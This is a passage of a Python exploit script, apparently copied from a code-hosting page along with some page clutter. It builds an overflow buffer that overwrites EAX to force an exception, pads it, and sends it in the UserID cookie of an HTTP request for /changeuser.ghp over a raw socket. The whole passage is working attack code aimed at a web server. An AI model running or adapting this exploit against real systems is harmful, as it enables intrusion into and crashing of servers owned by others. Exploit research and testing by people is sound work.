buffer += struct.pack("<I", 0xffffffff) # overwrite EAX to always trigger an exception
|
||||
buffer += "A" * (max_size - len(buffer)) # padding
|
||||
|
||||
|
||||
httpreq = (
|
||||
"GET /changeuser.ghp HTTP/1.1\r\n"
|
||||
"User-Agent: Mozilla/4.0\r\n"
|
||||
"Host:" + host + ":" + str(port) + "\r\n"
|
||||
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
|
||||
"Accept-Language: en-us\r\n"
|
||||
"Accept-Encoding: gzip, deflate\r\n"
|
||||
"Referer: http://" + host + "/\r\n"
|
||||
"Cookie: SESSIONID=6771; UserID=" + buffer + "; PassWD=;\r\n"
|
||||
"Conection: Keep-Alive\r\n\r\n"
|
||||
)
|
||||
|
||||
# Send payload to the server
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((host, port))
|
||||
s.send(httpreq)
|
||||
s.close()
|
Loading…
Add table
Reference in a new issue